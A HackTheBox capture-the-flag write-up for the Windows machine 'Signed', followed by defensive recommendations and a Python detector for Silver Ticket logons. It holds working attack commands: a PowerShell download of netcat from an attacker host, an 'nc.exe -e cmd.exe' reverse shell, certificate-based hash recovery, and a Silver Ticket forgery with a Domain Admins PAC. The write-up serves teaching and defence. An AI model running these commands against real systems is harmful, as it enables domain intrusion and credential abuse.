Signed

HackTheBox
Medium
Windows
Tags: Active Directory, Kerberos, Silver Ticket, MSSQL, Certificate
Reconnaissance

🔍 1. Initial Nmap Scan

Started with a comprehensive nmap scan to identify open ports and services:

nmap -sCV -T4 -p- -oN nmap-signed.nmap 10.10.11.55
Key Findings:
  • Port 53: DNS
  • Port 88: Kerberos
  • Port 135, 139, 445: SMB/RPC
  • Port 389, 636, 3268, 3269: LDAP/LDAPS
  • Port 1433: MSSQL
  • Domain: SIGNED.HTB

📋 2. SMB Enumeration

Enumerated SMB shares using netexec:

netexec smb 10.10.11.55 -u 'guest' -p '' --shares

Discovered writable share:

  • Share: SharedDocs (READ, WRITE)

🔐 3. Certificate Analysis

Found a PKCS#12 bundle (signedca.pfx, carrying a certificate together with its private key) on the SMB share and pulled it down as guest:

smbclient //10.10.11.55/SharedDocs -U guest%
get signedca.pfx

Split the bundle into its certificate and private key (both pkcs12 commands prompt for the PKCS#12 import password) and read the subject to learn which account the certificate was issued to:

openssl pkcs12 -in signedca.pfx -nokeys -out signedca_cert.pem
openssl pkcs12 -in signedca.pfx -nocerts -nodes -out signedca_key.pem
openssl x509 -in signedca_cert.pem -noout -subject -issuer -dates
Certificate Information:
  • Subject: CN=mssqlsvc
  • Issuer: CN=signedca
  • Domain: signed.htb

🎟️ 4. Request TGT using Certificate

Used certipy to authenticate with the certificate over PKINIT and request a TGT for mssqlsvc. Certipy saves the TGT to mssqlsvc.ccache and then recovers the account's NT hash through Kerberos U2U, so one exposed certificate yields both a usable ticket and a reusable hash for the account that owns the MSSQLSvc SPN:

certipy auth -pfx signedca.pfx -dc-ip 10.10.11.55 -domain signed.htb -username mssqlsvc -ns 10.10.11.55
Obtained Credentials:
  • Username: mssqlsvc
  • NT Hash: EF699384C3285C54128A3EE1DDB1A0CC
User

🗄️ 5. MSSQL Access

Connected to the SQL Server with Kerberos authentication, with KRB5CCNAME pointed at the mssqlsvc.ccache that certipy saved (-k -no-pass makes mssqlclient.py present the cached ticket instead of a password or hash):

mssqlclient.py -k -no-pass -dc-ip 10.10.11.55 SIGNED.HTB/mssqlsvc@DC01.SIGNED.HTB
Connection Details:

Successfully authenticated to SQL Server as mssqlsvc over Kerberos; the server required TDS encryption for the session.


⚙️ 6. Enable xp_cmdshell

Enabled xp_cmdshell to execute OS commands. sp_configure requires the ALTER SETTINGS permission (sysadmin or serveradmin), so succeeding here already shows that the mssqlsvc login holds a server-level admin role:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

🔄 7. Reverse Shell Setup

Downloaded netcat to the target through xp_cmdshell (wget is the PowerShell alias for Invoke-WebRequest, hence -UseBasicParsing):

xp_cmdshell "powershell wget -UseBasicParsing http://10.10.14.5:3000/nc.exe -OutFile %temp%/nc.exe"

Started listener on attacking machine:

rlwrap nc -nlvp 4000

Executed reverse shell from MSSQL:

xp_cmdshell %temp%\nc.exe -nv 10.10.14.18 4000 -e cmd.exe
Shell Access: Successfully obtained reverse shell as SIGNED\mssqlsvc

🚩 8. User Flag

Retrieved the user flag from the Desktop:

C:\Users\mssqlsvc\Desktop> type user.txt
[USER FLAG RETRIEVED]
Root

🔍 9. SID Enumeration

Retrieved the domain SID, the RIDs of the privileged groups and the RID of the service account; the domain SID plus a list of RIDs is exactly what ticketer.py needs to build the PAC of a Silver Ticket:

Domain SIDs:
  • Domain Admins: S-1-5-21-4088429403-1159899800-2753317549-512
  • Enterprise Admins: S-1-5-21-4088429403-1159899800-2753317549-519
  • mssqlsvc RID: 1103

🎫 10. Forge Silver Ticket

Forged a Kerberos service ticket (Silver Ticket) for the MSSQLSvc SPN. A service ticket is encrypted with the key of the account the SPN is registered on, which is the mssqlsvc NT hash already recovered, so the ticket is built entirely offline, the KDC is never consulted, and the PAC inside it can claim any group membership:

ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
  -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
  -domain SIGNED.HTB \
  -spn MSSQLSvc/DC01.SIGNED.HTB \
  -groups 512,519,1105 \
  -user-id 1103 \
  mssqlsvc
Technique Explanation:
  • -nthash: key of the service account (mssqlsvc) used to encrypt the ticket
  • -domain-sid: domain SID prefixed to every RID written into the PAC
  • -groups 512,519,1105: group RIDs placed in the PAC; 512 is Domain Admins, 519 is Enterprise Admins, 1105 is a domain-allocated RID (values from 1000 upwards are assigned per domain)
  • -user-id 1103: RID of SIGNED\mssqlsvc, the identity the ticket asserts
  • -spn MSSQLSvc/DC01.SIGNED.HTB: the service principal the ticket is valid for

ticketer.py writes the forged ticket to mssqlsvc.ccache; export it so the Impacket tools pick it up:

export KRB5CCNAME=mssqlsvc.ccache

🔓 11. Privileged MSSQL Access

Connected to MSSQL again with the same mssqlclient.py -k -no-pass command, now presenting the forged ticket, and enabled advanced options. The Silver Ticket does not change the SQL-level permissions here (mssqlsvc could already run sp_configure in step 6); what it changes is the Windows token SQL Server builds from the PAC, which now carries the Domain Admins SID:

EXEC sp_configure 'show advanced options', 1; 
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1; 
RECONFIGURE;

The BULK form of OPENROWSET used next is gated by the ADMINISTER BULK OPERATIONS permission (held by sysadmin), not by the 'Ad Hoc Distributed Queries' option, which governs OPENROWSET and OPENDATASOURCE with OLE DB providers; enabling it is harmless but not what makes the file read work.

👑 12. Root Flag Retrieval

With the forged token in place, read the root flag straight from the Administrator's desktop. For a Windows-authenticated login, SQL Server impersonates the caller's security context when OPENROWSET(BULK) opens the file, so the Domain Admins SID injected into the PAC is what grants access to a folder the real mssqlsvc account could not read:

SELECT * FROM OPENROWSET(
    BULK 'C:\Users\Administrator\Desktop\root.txt', 
    SINGLE_CLOB
) AS x;
BulkColumn
---------------------------------------
b'329df3df42d69adbe23f40b9d063aa60\r\n'
Root Access Achieved: Successfully escalated privileges using forged Silver Ticket and retrieved root flag!

Attack Chain Summary

This writeup demonstrated a classic Active Directory attack chain leveraging certificate-based authentication and Kerberos Silver Ticket forgery:

SMB Guest Access
    → Certificate Discovery
    → Certipy Authentication (TGT Request)
    → NT Hash Extraction
    → MSSQL Kerberos Login
    → xp_cmdshell Execution
    → Reverse Shell as mssqlsvc
    → SID Enumeration
    → Silver Ticket Forgery
    → Privileged MSSQL Access
    → Root Flag Retrieval

Key Techniques Demonstrated

  • Certificate-Based Authentication: Using PKINIT to request TGT with certificate
  • Kerberos Silver Ticket: Forging service tickets with elevated privileges
  • MSSQL Exploitation: Leveraging xp_cmdshell for command execution
  • Privilege Escalation: Abusing service account with manipulated group memberships
  • Ad Hoc Queries: Using OPENROWSET for file system access

Tools Used

  • Nmap: Network reconnaissance and service enumeration
  • NetExec: SMB enumeration and share discovery
  • OpenSSL: Certificate analysis and manipulation
  • Certipy: Certificate-based authentication and TGT requests
  • mssqlclient.py (Impacket): MSSQL client with Kerberos support
  • ticketer.py (Impacket): Kerberos ticket forgery
  • Netcat: Reverse shell establishment

Critical Vulnerabilities Exploited

  • Exposed Certificate: a PKCS#12 bundle containing the mssqlsvc private key sat on a share that guest could read (and write)
  • Certificate Authentication: the service account certificate was accepted for PKINIT, turning a file on a share into a domain logon
  • xp_cmdshell Enabled: the mssqlsvc login held a server-level admin role, so xp_cmdshell could be switched on and used for arbitrary command execution
  • Service Account Hash: certipy recovered the NT hash via Kerberos U2U after the PKINIT logon, a long-lived credential for the account that owns the MSSQLSvc SPN
  • Silver Ticket Attack: the SQL Server accepted a service ticket forged with that hash and trusted its PAC without validating it against a domain controller
  • Forged Group Membership Honoured: the Domain Admins SID injected into the PAC ended up in the token SQL Server impersonates for OPENROWSET(BULK), so the Administrator's files were readable

Defensive Recommendations:
  • Restrict SMB guest access and properly secure sensitive shares; never store private keys or PFX bundles on them
  • Implement proper certificate management and access controls, and revoke any certificate that has been exposed
  • Disable xp_cmdshell unless absolutely necessary, and do not grant sysadmin to service logins
  • Use Managed Service Accounts (MSA/gMSA) with rotating credentials, so a recovered NT hash stops working at the next rotation
  • Monitor for Silver Ticket indicators: a Kerberos network logon (event 4624) on the service host with no matching service ticket request (event 4769) on any domain controller, and RC4-encrypted tickets for accounts that support AES
  • Implement least privilege for service accounts
  • Enable PAC validation on servers (ValidateKdcPacSignature) and advanced Kerberos auditing, so a forged PAC is checked with the DC instead of trusted
  • Use Protected Users group for sensitive accounts
  • Implement PAW (Privileged Access Workstation) for administrative tasks
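The monitoring recommendation above, worked through as an added example (not code from the original writeup): a Silver Ticket is built offline with the service account's key, so the target host still records a Kerberos network logon (event 4624, logon type 3) while no domain controller records a service ticket request (event 4769) for that account and host. The events below are constructed and carry only a simplified subset of the real event fields; the correlation window is the default 10-hour service ticket lifetime, since one 4769 legitimately backs every logon that reuses its ticket. This assumes 4769 is collected from every DC and clocks are synchronised.

```python
"""Spot Kerberos service logons that no domain controller issued a ticket for."""
from dataclasses import dataclass
from datetime import datetime, timedelta

SERVICE_TICKET_LIFETIME = timedelta(hours=10)  # AD default "Maximum lifetime for service ticket"


@dataclass(frozen=True)
class Event:
    time: datetime
    host: str                  # computer that logged the event
    event_id: int              # 4624 (logon) or 4769 (service ticket request)
    account: str               # SIGNED\mssqlsvc, mssqlsvc@SIGNED.HTB, ...
    logon_type: int = 0        # 4624 only: 3 = network
    auth_package: str = ""     # 4624 only: Kerberos / NTLM
    service_name: str = ""     # 4769 only: SPN requested, e.g. MSSQLSvc/DC01.SIGNED.HTB:1433
    status: str = "0x0"        # 4769 only: 0x0 = ticket issued


def account_name(raw: str) -> str:
    """Normalise DOMAIN\\user and user@REALM to a bare lower-case user name."""
    return raw.split("@")[0].split("\\")[-1].lower()


def spn_host(spn: str) -> str:
    """Reduce an SPN such as MSSQLSvc/DC01.SIGNED.HTB:1433 to the short host name (dc01)."""
    target = spn.split("/", 1)[1] if "/" in spn else spn
    return target.split(":")[0].split(".")[0].lower()


def unbacked_kerberos_logons(events, lifetime=SERVICE_TICKET_LIFETIME):
    """Return 4624 Kerberos network logons with no successful 4769 for the same
    account and target host within `lifetime` before the logon."""
    issued = [e for e in events if e.event_id == 4769 and e.status == "0x0"]
    suspects = []
    for logon in events:
        if logon.event_id != 4624 or logon.logon_type != 3 or logon.auth_package.lower() != "kerberos":
            continue
        backed = any(
            account_name(t.account) == account_name(logon.account)
            and spn_host(t.service_name) == logon.host.lower()
            and logon.time - lifetime <= t.time <= logon.time
            for t in issued
        )
        if not backed:
            suspects.append(logon)
    return suspects


# Constructed sample: one legitimate ticket reused twice, one NTLM logon, then a forged ticket.
SAMPLE_EVENTS = [
    Event(datetime(2025, 3, 1, 10, 0), "DC01", 4769, "mssqlsvc@SIGNED.HTB",
          service_name="MSSQLSvc/DC01.SIGNED.HTB:1433"),
    Event(datetime(2025, 3, 1, 10, 2), "DC01", 4624, "SIGNED\\mssqlsvc", logon_type=3, auth_package="Kerberos"),
    Event(datetime(2025, 3, 1, 14, 30), "DC01", 4624, "SIGNED\\mssqlsvc", logon_type=3, auth_package="Kerberos"),
    Event(datetime(2025, 3, 1, 15, 0), "DC01", 4624, "SIGNED\\guest", logon_type=3, auth_package="NTLM"),
    # Next morning: a Kerberos logon with no 4769 behind it, which is what a Silver Ticket leaves behind.
    Event(datetime(2025, 3, 2, 9, 0), "DC01", 4624, "SIGNED\\mssqlsvc", logon_type=3, auth_package="Kerberos"),
]


def run_detection(events=SAMPLE_EVENTS):
    """Run the correlation over the sample and return the suspicious 4624 events."""
    return unbacked_kerberos_logons(events)


if __name__ == "__main__":
    for e in run_detection():
        print(f"{e.time:%Y-%m-%d %H:%M} {e.host}: Kerberos logon for {e.account} with no matching 4769")
```

Only the 09:00 logon on the second day is flagged: the two earlier logons fall inside the lifetime of the ticket issued at 10:00, and the NTLM logon is out of scope because a Silver Ticket is a Kerberos artefact. In a real deployment the same logic runs over 4624 from the SQL host and 4769 from all DCs, and a hit is worth pairing with the ticket's encryption type, since forged RC4 tickets for an AES-capable account are a second indicator.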